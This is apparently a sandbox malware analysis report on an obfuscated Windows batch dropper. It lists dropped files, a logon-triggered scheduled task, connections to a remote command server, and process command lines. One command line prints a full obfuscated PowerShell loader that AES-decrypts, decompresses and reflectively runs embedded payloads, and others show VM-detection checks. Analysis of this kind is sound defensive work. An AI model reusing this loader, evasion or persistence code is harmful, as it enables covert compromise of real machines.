                                                                  Preview:@echo off..%CmQiIgrXupacUcKPqvVOFTdvyur%@%zACKdYngEFLgLAMGirTMKNXDBlKJjuJnPwyTNqZVPEkLKOcfhwngAFkLDZi%%oDXjVxrocSTRsYXfCmTMiFCMhDMjlMqNhhHlHbPmxOdoDvOCIeirfvJJ%e%kbsKhdpCfJk%%LyBwHpuBojMOkAgDYILyYjwZwBp%c%NLxLDlWGHUygphNbpEAGWMDwYMsBcCafZJOCLalYEAWekFiQw%%JSaIObhaNQTuDfUsgGskqotCcvPzmtEB%h%HSifqUNuKnufjWR%%SyCymeuzxGtlIOtmrpWm%o%mQLFPGbYxTyYpuVbdSCxJHKBBMVTiNTaEyFHRSwytAaMUntty%%nwtOcFfkedKhPJZytQPnk% %vediHXGotCvXAxGPvaCHO%%NmLqNwTCElacboLUXhDQKiLSjCRDuO%o%CwcrQxrkkuQXjXxvseBcvdYJFASglFqiPAxFYXUxGWsvTkBV%%gyzTMpzysLqEkYEeIhJzSxvkdvyLCPuYXufgQodlYhGlETwYNr%f%dSvTJdpPqQOVCrrGPTyntd%%AKQjFkZAXkErgCAwdBzNvkldUnnGepeRZv%f%jSTJFqpQKYaldoxvLUqcqzNpsWsvHgMrLHrEjSTwftAfTcjrHUtXIsEJeEr%..%XUjElIAwXTlTaUWWYIvqNbOMNOJscHzFAlylkWTlCMuOIA%s%OvILwibUWfwRwYhtptGsPvLMcOjNaGaenSUWuWdwzqCfNewmuseubhhtKVIHY%%TpfsEEelZsqkSzTGZYrWtIBF%e%fKBlzovymwmZ%%ASiitMdRoIAdWKpbTlNAqyTCZzeULGc%t%HExzOkoPBkQcbiDDgwslyyebYFiTHifIFTwrmPnIXYYg%%QBRWAOpnRiiAwBicuiseixhLlrqjJnAAYshdrXgtQuOKoR%l%oeGCPFbAtugLjygDDIICdtfKxcYoN
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):3494
                                                                  Entropy (8bit):3.580727026847448
                                                                  Encrypted:false
                                                                  SSDEEP:96:tpX9nkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:j1kYx39OhO6jy++
                                                                  MD5:934211E98AB08A31D60AB6D2B68F11AA
                                                                  SHA1:C31571CC844F6678A52C42C58298452F15F055DA
                                                                  SHA-256:2CDE49B80B3EB4981F317C49B75920B158B7886F0DAABDCF9498F9F64B41E61A
                                                                  SHA-512:DD257706D5F8F05C76D2ED30EE1D7D94682A6730F5ADD46104EAFEEC95B02AB9187295758D9AB973B385796334B7C10EEE489F61AF013F88A493F9E2D1A78770
                                                                  Malicious:false
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.0.9.T.0.3.:.2.2.:.2.3...8.2.5.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.g.y.k.i.B.R.c.P.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):3.988722393354298
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKi3bNv+B8hmsaJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:gcumspkPlE99SCQl2DUevat
                                                                  MD5:23F9F1A76209DA8BC8D9EDE1FDBC4C6F
                                                                  SHA1:7277F97CCBEA5C2AD643E3D78C7B9598F4DE2435
                                                                  SHA-256:C67831D1EFC585BCE36153237E90DC2CAAB262771439295435EE83F342BF7FCD
                                                                  SHA-512:73FF59FE5045B2DF410AFD0AF60714DBCC1EEF4E13A252287152B7B3FFB6B2D504BEACF29D86E4E19CDC74F491EAE96271F24DC76626D8FD4FB4B69F706FD16F
                                                                  Malicious:false
                                                                  Preview:p...... ........+.].....(................A...J......J....H..J..............J.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):412
                                                                  Entropy (8bit):3.9746304479877996
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKqT/rO8sYe8kt2alXlRNfOAUMivhClroFFKIhipStaHAaloq09Sls8hW0XSW83n:Si1zmxMiv8sFFKbpgal7BlvTCN3
                                                                  MD5:B8B7B8E610EF766FC1EA05D7FC271688
                                                                  SHA1:16646AFB3383E7E5C06AF1454684DBD72596D9DB
                                                                  SHA-256:E92CFDF38D2D2C7B51E8FD5359AB3EC247BF05288ED603EBF2049B3B32ECBC3D
                                                                  SHA-512:84BBFAC4CF4076179DB169E9FC60AE36C5D16D46E4C14D03636FF7993A4599E8FD86C9014B5CCDD100B52F11DBCF13AD5F2B921FC25DFF83B225985BF9B743FD
                                                                  Malicious:false
                                                                  Preview:p...... ....(........J..(.......2...........,............................... ..........O.... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.q.v.p.s.X.K.Y.8.R.R.Q.e.o.7.4.f.f.H.U.x.c.%.3.D...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):412
                                                                  Entropy (8bit):3.928333974030045
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKqT/sElvXJty4/lXlRNfOAUMivhClroFFKIhipStaHAaloq09SlsbhQ6Shlrn:SYMjy4/zmxMiv8sFFKbpgal7BlwhZg
                                                                  MD5:854687C7DB6C7FA5C06125E196518567
                                                                  SHA1:9D1005A5D61EFE012EF69CCAC07C1627B0ACFAA7
                                                                  SHA-256:0E88ECE2C8A374AFAF8971C270659B9931236CC9260F9545716B7E947CADD28D
                                                                  SHA-512:7BFC54FCAB26786965FA7D83151EAA896340E002032009ABD41E19F4630AFD5F9B0E4082E994C69E6C737FA0F321077D250D36DA9EDD464CD059CE1D5FF48AF3
                                                                  Malicious:false
                                                                  Preview:p...... ....(........J..(.......2..........+......b..'....................b..'.. ............... ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.5.0.o.t.x.%.2.F.h.0.Z.t.l.%.2.B.z.8.S.i.P.I.7.w.E.W.V.x.D.l.Q.Q.U.T.i.J.U.I.B.i.V.5.u.N.u.5.g.%.2.F.6.%.2.B.r.k.S.7.Q.Y.X.j.z.k.C.E.A.p.D.q.V.C.b.A.T.U.v.i.Z.V.5.7.H.I.I.u.l.A.%.3.D...
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):330
                                                                  Entropy (8bit):3.431657893255811
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKlPK8k38uScN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:gukPlE99Si1QyIeek
                                                                  MD5:5E911BF6B090DA5DACEEC2947760D240
                                                                  SHA1:9CA1DB41C8B1A037D0157CC4C0EE1BC48C191D18
                                                                  SHA-256:78B3C72467D6F8F512B786BB3A19FD95BFAC07BE041B241BA13D4512455EAFB0
                                                                  SHA-512:15A3CAFD7547146DFF0EEA0055A476E447E96BECAACD8014BF06E31BA2E7F1279AC461D5C1296E08F9ADD85DCC641A9E9D62EA3D60BDD276441E7BF7A5009905
                                                                  Malicious:false
                                                                  Preview:p...... .........Yn .J..(...............................................dK.L#... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (2186), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2376
                                                                  Entropy (8bit):5.706979995129201
                                                                  Encrypted:false
                                                                  SSDEEP:48:9JFHDRp3RQGRf9RxFB3AdB3YtnoT8IvBDoO4or5JWl1KXEVhvMo2U7A2UHdT2UUC:PFHDRp3iGX7FBeBotnoT8WBDZ4qWlPB+
                                                                  MD5:8AEC379B66959725291E9B57AA576817
                                                                  SHA1:16FFB8651E8D3546071AB52790EE1AD8756CC6D1
                                                                  SHA-256:1C2AA307AE33B7E5135A71AE04878621C0F2F2EF6909106F28FE92E94D2E70B0
                                                                  SHA-512:EC7D0271A6E1C47B38B17CB4041CB2A72EC257E039768D1C1DD00C51D847826DDD27BBE92F4E4BA6E8E170D293456016E41D1E7165FDE9CEF76361FF98822403
                                                                  Malicious:false
                                                                  Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function PChco($juOOu){.$nHZjS=[System.Security.Cryptography.Aes]::Create();.$nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI=');.$nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w==');.$ifjSd=$nHZjS.CreateDecryptor();.$kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length);.$ifjSd.Dispose();.$nHZjS.Dispose();.$kfQiQ;}function QsuOu($juOOu){.Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', '');.Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*r
                                                                  File type:DOS batch file, ASCII text, with very long lines (3523), with CRLF line terminators
                                                                  Entropy (8bit):6.016918973410356
                                                                  TrID:
                                                                    File name:NhoqAfkhHL.bat
                                                                    File size:7'301'955 bytes
                                                                    MD5:98f30844747b3b14f19b6127df1765dc
                                                                    SHA1:2441d2660c67e64784c729732553779b952a8296
                                                                    SHA256:c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750
                                                                    SHA512:55521bbf96e79678fab3ebfe364f3f87cc53080616f4ead5ef5129b52410fffa782c541aee2cf58486e5eb25efd3fe56ea6c7178d03fa48cd786ea53ef0c478e
                                                                    SSDEEP:49152:afRq7YF410Ckz3qmh8VhdBC6+2u49Gc54h/GD8pWlvdOPX7XM/nTrOslcFMB+Bs5:t
                                                                    TLSH:617633A0ABD83D8F0956863FE0DBBB3C17951F92089BB4DAC6D4314B4D5FB929903C16
                                                                    File Content Preview:@echo off..%CmQiIgrXupacUcKPqvVOFTdvyur%@%zACKdYngEFLgLAMGirTMKNXDBlKJjuJnPwyTNqZVPEkLKOcfhwngAFkLDZi%%oDXjVxrocSTRsYXfCmTMiFCMhDMjlMqNhhHlHbPmxOdoDvOCIeirfvJJ%e%kbsKhdpCfJk%%LyBwHpuBojMOkAgDYILyYjwZwBp%c%NLxLDlWGHUygphNbpEAGWMDwYMsBcCafZJOCLalYEAWekFiQw%
                                                                    Icon Hash:9686878b929a9886
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 9, 2024 09:17:34.059844971 CET4973619465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:34.179090023 CET1946549736147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:17:34.179166079 CET4973619465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:34.204926014 CET4973619465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:34.324182987 CET1946549736147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:17:56.087608099 CET1946549736147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:17:56.087698936 CET4973619465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:56.094336033 CET4973619465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:56.213757992 CET1946549736147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:17:59.570748091 CET4979819465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:59.690073013 CET1946549798147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:17:59.690156937 CET4979819465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:59.690500975 CET4979819465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:17:59.809743881 CET1946549798147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:21.603784084 CET1946549798147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:21.609230995 CET4979819465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:21.609788895 CET4979819465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:21.729026079 CET1946549798147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:25.195575953 CET4984919465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:25.314979076 CET1946549849147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:25.317209005 CET4984919465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:25.317542076 CET4984919465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:25.436908007 CET1946549849147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:47.213227034 CET1946549849147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:47.213309050 CET4984919465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:51.651763916 CET4984919465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:51.771179914 CET1946549849147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:55.867499113 CET4985419465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:18:55.987103939 CET1946549854147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:18:55.987974882 CET4985419465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:19:01.819343090 CET4985419465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:19:01.938805103 CET1946549854147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:19:17.886059999 CET1946549854147.185.221.24192.168.2.5
                                                                    Dec 9, 2024 09:19:17.887198925 CET4985419465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:19:17.887439966 CET4985419465192.168.2.5147.185.221.24
                                                                    Dec 9, 2024 09:19:18.007253885 CET1946549854147.185.221.24192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 9, 2024 09:17:33.782208920 CET5928453192.168.2.51.1.1.1
                                                                    Dec 9, 2024 09:17:34.052820921 CET53592841.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 9, 2024 09:17:33.782208920 CET192.168.2.51.1.1.10x71fbStandard query (0)capacity-sg.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 9, 2024 09:17:17.433721066 CET1.1.1.1192.168.2.50xb5f2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Dec 9, 2024 09:17:17.433721066 CET1.1.1.1192.168.2.50xb5f2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Dec 9, 2024 09:17:20.911425114 CET1.1.1.1192.168.2.50xd623No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 9, 2024 09:17:20.911425114 CET1.1.1.1192.168.2.50xd623No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                    Dec 9, 2024 09:17:33.503856897 CET1.1.1.1192.168.2.50x1cb2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 9, 2024 09:17:33.503856897 CET1.1.1.1192.168.2.50x1cb2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                    Dec 9, 2024 09:17:34.052820921 CET1.1.1.1192.168.2.50x71fbNo error (0)capacity-sg.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:03:16:59
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" "
                                                                    Imagebase:0x7ff792220000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:03:16:59
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:16:59
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wmic diskdrive get Model
                                                                    Imagebase:0x7ff68d690000
                                                                    File size:576'000 bytes
                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:03:16:59
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\findstr.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
                                                                    Imagebase:0x7ff698e50000
                                                                    File size:36'352 bytes
                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:03:17:00
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
                                                                    Imagebase:0x7ff792220000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:03:17:00
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -WindowStyle Hidden
                                                                    Imagebase:0x7ff7be880000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:03:17:09
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}
                                                                    Imagebase:0x7ff669820000
                                                                    File size:21'312 bytes
                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:03:17:09
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:winlogon.exe
                                                                    Imagebase:0x7ff6156c0000
                                                                    File size:906'240 bytes
                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:03:17:11
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\lsass.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                    Imagebase:0x7ff654c90000
                                                                    File size:59'456 bytes
                                                                    MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:10
                                                                    Start time:03:17:11
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                    Imagebase:0x7ff792220000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:03:17:11
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:03:17:12
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:13
                                                                    Start time:03:17:14
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                    Imagebase:0x7ff792220000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:14
                                                                    Start time:03:17:14
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
